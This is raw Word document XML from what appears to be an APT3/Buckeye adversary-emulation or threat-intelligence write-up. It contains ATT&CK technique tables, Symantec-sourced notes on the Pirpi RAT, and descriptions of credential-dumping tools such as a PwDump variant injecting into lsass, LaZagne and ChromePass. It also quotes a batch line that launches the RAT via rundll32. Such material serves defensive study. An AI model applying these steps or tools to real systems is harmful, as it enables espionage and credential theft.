          <w:p w14:paraId="139FE73E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Install </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>second stage tool (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Bubblewrap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="29987CDF" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05EF2A00" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432B0729"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64BE7C78" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AB9F9DB" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BBF418B" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A13DD57" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB346D6" w14:textId="001AB5DB" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37B15862" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>To install second stage tool above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00ED5880" w14:paraId="1EB54A26" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59FB459C" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17AA6045" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">TA005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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E3BEE6F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="007469AA" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007469AA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036.005 Masquerading: Match Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C372171" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01670BEB" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00F077B1" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0AD579" w14:textId="3150BCC8" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CAC729A" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00ED5880" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Rename second stage tool with benign name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BEA633B" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="0077286F" w:rsidRDefault="00FC3056" w:rsidP="00FC3056"/>
    <w:p w14:paraId="59ED9697" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="00C94979" w:rsidRDefault="00FC3056" w:rsidP="00FC3056"/>
    <w:p w14:paraId="0AB6F5A0" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRDefault="00FC3056" w:rsidP="00FC3056">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32974B76" w14:textId="2CF3C7C6" w:rsidR="00FC3056" w:rsidRDefault="002C0E82" w:rsidP="00FC3056">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>techdoc_lite</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>-deliverables-numbered option.dotx (mitre.org)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001F5389">
        <w:t xml:space="preserve"> [2017]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653D110" w14:textId="78C6E9C6" w:rsidR="00BB0357" w:rsidRPr="00FC3056" w:rsidRDefault="00BB0357" w:rsidP="00FC3056">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00C67678">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Endpoint Protection - Symantec Enterprise (broadcom.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A10178">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F5389">
        <w:t xml:space="preserve"> [2016] </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="007B3BB1" w:rsidRPr="007B3BB1">
        <w:t>Spear Phishing with Malicious RAR Attachment</w:t>
      </w:r>
      <w:r w:rsidR="007B3BB1">
        <w:t xml:space="preserve"> [3]</w:t>
      </w:r>
      <w:r w:rsidR="007B3BB1" w:rsidRPr="007B3BB1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B3BB1">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>from above</w:t>
      </w:r>
      <w:r w:rsidR="00C67678">
        <w:t xml:space="preserve"> and in ATT&amp;CK APT description</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1BC170" w14:textId="3293ED09" w:rsidR="007B3BB1" w:rsidRPr="00FC3056" w:rsidRDefault="007B3BB1" w:rsidP="007B3BB1">
      <w:bookmarkStart w:id="66" w:name="_Toc110935513"/>
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>2014-06-10 - Clandestine Fox, Part Deux.pdf (vx-underground.org)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2014] (</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3BB1">
        <w:t>Spear Phishing with Malicious RAR Attachment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [7]</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3BB1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>- from above and in ATT&amp;CK APT description)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C4B0C" w14:textId="77777777" w:rsidR="007B191E" w:rsidRDefault="007B191E"/>
    <w:p w14:paraId="2AFC768D" w14:textId="7A912EAF" w:rsidR="0069312B" w:rsidRDefault="007B191E" w:rsidP="007B191E">
      <w:r>
        <w:t xml:space="preserve">[1] In attacks dating late 2015 to early 2016 APT3 has been known to use a zip archive containing a Windows shortcut file with an Internet Explorer logo. Clicking on this link led to a download of APT3’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3CA40" w14:textId="77777777" w:rsidR="00747B7B" w:rsidRDefault="00747B7B" w:rsidP="00747B7B">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RAT started via .bat running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179DA2BE" w14:textId="0098CC57" w:rsidR="00747B7B" w:rsidRDefault="00747B7B" w:rsidP="003A2730">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15791E1B" w14:textId="77777777" w:rsidR="00747B7B" w:rsidRDefault="00747B7B" w:rsidP="003A2730">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmd.exe /C start rundll32.exe "C:\Documents and Settings\admin\Application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8D973" w14:textId="6284A56F" w:rsidR="00747B7B" w:rsidRDefault="00747B7B" w:rsidP="003A2730">
      <w:r>
        <w:t xml:space="preserve">Data\mt.dat" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UpdvaMt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16B083AD" w14:textId="77777777" w:rsidR="00D92F01" w:rsidRDefault="0069312B" w:rsidP="007B191E">
      <w:r>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:r w:rsidRPr="0069312B">
        <w:t xml:space="preserve">Buckeye uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0069312B">
        <w:t>Backdoor.Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0069312B">
        <w:t xml:space="preserve">, a remote access Trojan capable of reading, writing, and executing files and programs. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0069312B">
        <w:t>Backdoor.Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0069312B">
        <w:t xml:space="preserve"> also collects information about the target’s local network, including the domain controller and workstations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743C0556" w14:textId="65ABE76B" w:rsidR="002C0E82" w:rsidRDefault="00D92F01" w:rsidP="00D92F01">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="00E74707">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implant Command and Control</w:t>
      </w:r>
      <w:r w:rsidR="00E74707" w:rsidRPr="00E74707">
        <w:cr/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">APT3 implants issue command and control (C2) traffic as HTTP GET requests that beacon at set intervals [14]. The HTTP Cookie field contains information for the C2 server, which responds with a webpage that contains the command encoded within a specific HTML tag [15]. APT3 implants have also been known to use custom binary protocols [2]. Pirpi.2014 and Pirpi.2015 both contain several kinds of sleep and anti-sandbox strategies that cause the RAT to pause between executions [15]. Some of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instances have been known to also use SSL for their </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">communications and even include public/private keys within the binaries [17]. This level of C2 customization can be achieved with Cobalt Strike’s malleable C2 profiles, as seen in the accompanying Malleable C2 profile </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on [14] </w:t>
      </w:r>
      <w:r w:rsidR="002C0E82">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="710E94DA" w14:textId="18C5B84C" w:rsidR="001E0D48" w:rsidRDefault="0085443A" w:rsidP="001E0D48">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc153480861"/>
      <w:r w:rsidRPr="0085443A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">T1078.002 </w:t>
      </w:r>
      <w:r w:rsidR="001E0D48">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="0085443A">
        <w:t>Buckeye cyberespionage group shifts gaze from US to Hong Kong</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="2A563C55" w14:textId="41956D5B" w:rsidR="0085443A" w:rsidRDefault="00691E0D" w:rsidP="0085443A">
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="0085443A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Endpoint Protection - Symantec Enterprise (broadcom.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C91008C" w14:textId="3FB021A6" w:rsidR="0085443A" w:rsidRDefault="001241E6" w:rsidP="0085443A">
      <w:r>
        <w:t xml:space="preserve">Active for half a decade </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6307ABFA" w14:textId="1A3E0C51" w:rsidR="001241E6" w:rsidRDefault="001241E6" w:rsidP="0085443A">
      <w:r>
        <w:t>Initially US but from 2016 mostly Hong Kong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596B3453" w14:textId="55C028AB" w:rsidR="00625EF8" w:rsidRDefault="00625EF8" w:rsidP="0085443A"/>
    <w:p w14:paraId="68D63976" w14:textId="1E7995A5" w:rsidR="004C0B59" w:rsidRDefault="004C0B59" w:rsidP="0085443A">
      <w:r w:rsidRPr="004C0B59">
        <w:t>sending malicious emails to targets as recently as August 4, and attempting to spread within compromised networks in order to steal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396E97A2" w14:textId="5A208544" w:rsidR="004C0B59" w:rsidRDefault="004C0B59" w:rsidP="0085443A">
      <w:r w:rsidRPr="004C0B59">
        <w:t>Buckeye used a remote access Trojan (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C0B59">
        <w:t>Backdoor.Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C0B59">
        <w:t xml:space="preserve">) in attacks against a US organization’s network in 2009. The group delivered </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C0B59">
        <w:t>Backdoor.Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C0B59">
        <w:t xml:space="preserve"> through malicious attachments or links in convincing spear-phishing emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA5735F" w14:textId="751D4CB1" w:rsidR="004C0B59" w:rsidRPr="0085443A" w:rsidRDefault="004C0B59" w:rsidP="0085443A">
      <w:r w:rsidRPr="004C0B59">
        <w:t>Buckeye has been known to exploit zero-day vulnerabilities in the past, such as CVE-2010-3962 in a campaign in 2010 and CVE-2014-1776 in 2014. Although other zero-day attacks have been reported, they have not been confirmed by Symantec. All zero-day exploits known, or suspected, to have been used by this group are for vulnerabilities in Internet Explorer and Flash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B72CC2" w14:textId="05D91C0E" w:rsidR="001E0D48" w:rsidRDefault="00D213FD" w:rsidP="001E0D48">
      <w:r w:rsidRPr="00D213FD">
        <w:t>In at least some of these recent attacks, Buckeye used spear-phishing emails with a malicious .zip attachment. The .zip archive attached to the email contains a Windows shortcut (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D213FD">
        <w:t>lnk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D213FD">
        <w:t xml:space="preserve">) file with the Microsoft Internet Explorer logo. Clicking on the shortcut ultimately leads to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D213FD">
        <w:t>Backdoor.Pirpi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D213FD">
        <w:t xml:space="preserve"> being downloaded and executed on the affected computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681D1654" w14:textId="77777777" w:rsidR="008B6EFF" w:rsidRDefault="008B6EFF" w:rsidP="008B6EFF">
      <w:r>
        <w:t>As mentioned previously, Buckeye also uses a number of hacking tools, including the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE8FC6" w14:textId="77777777" w:rsidR="008B6EFF" w:rsidRDefault="008B6EFF" w:rsidP="008B6EFF"/>
    <w:p w14:paraId="0213DC90" w14:textId="3A3B63C0" w:rsidR="008B6EFF" w:rsidRDefault="008B6EFF" w:rsidP="008B6EFF">
      <w:r>
        <w:t xml:space="preserve">Keylogger: The keylogger is configured using the command line parameters: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetworkService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Replace, Install, Register and Unregister. These parameters install it as a service. The keylogger then records keystrokes in encrypted files, for example: thumbcache_96.dbx. It also gathers network information such as the MAC address, IP address, WINS, DHCP server, and gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A3A90" w14:textId="2E30AADE" w:rsidR="008B6EFF" w:rsidRDefault="008B6EFF" w:rsidP="008B6EFF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RemoteCMD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: This tool executes commands on remote computers, similar to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool. Usage is: %s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shareIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domain [USER INFORMATION</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>|[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>USER NAME AND PASSWORD]] [/run:[COMMAND]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5FC64" w14:textId="6E3BC325" w:rsidR="008B6EFF" w:rsidRDefault="008B6EFF" w:rsidP="008B6EFF">
      <w:r>
        <w:t>The commands to be passed consist of upload, download, Service (create, delete, start, stop), delete, rename, and AT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516090B" w14:textId="5BD06FF4" w:rsidR="008B6EFF" w:rsidRDefault="008B6EFF" w:rsidP="008B6EFF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwDumpVariant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: This tool imports lsremora.dll (often downloaded by the attacker as part of the toolset) and uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GetHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> export of this DLL. On execution, the tool injects itself into lsass.exe and is triggered with the argument “dig”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3D1D3" w14:textId="77777777" w:rsidR="00424E34" w:rsidRDefault="00424E34" w:rsidP="00424E34">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ChromePass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: A tool from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NirSoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used for recovering passwords stored in the Chrome browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F58FC0" w14:textId="77777777" w:rsidR="00424E34" w:rsidRDefault="00424E34" w:rsidP="00424E34"/>
    <w:p w14:paraId="0D956D03" w14:textId="33D3EB92" w:rsidR="00424E34" w:rsidRDefault="00424E34" w:rsidP="00424E34">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lazagne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: A compiled Python tool that extracts passwords from various locally installed application classes, such as web browsers. The full list is: chats, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, mails, windows, database, sysadmin, and browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF660A" w14:textId="1418F33B" w:rsidR="00D213FD" w:rsidRDefault="00424E34" w:rsidP="00424E34">
      <w:r>
        <w:t>Buckeye seems to target file and print servers, which makes it likely the group is looking to steal documents. This, coupled with the group’s use of zero-day exploits in the past, customized tools, and the types of organizations being targeted would suggest that Buckeye is a state-sponsored cyberespionage group.</w:t>
      </w:r>
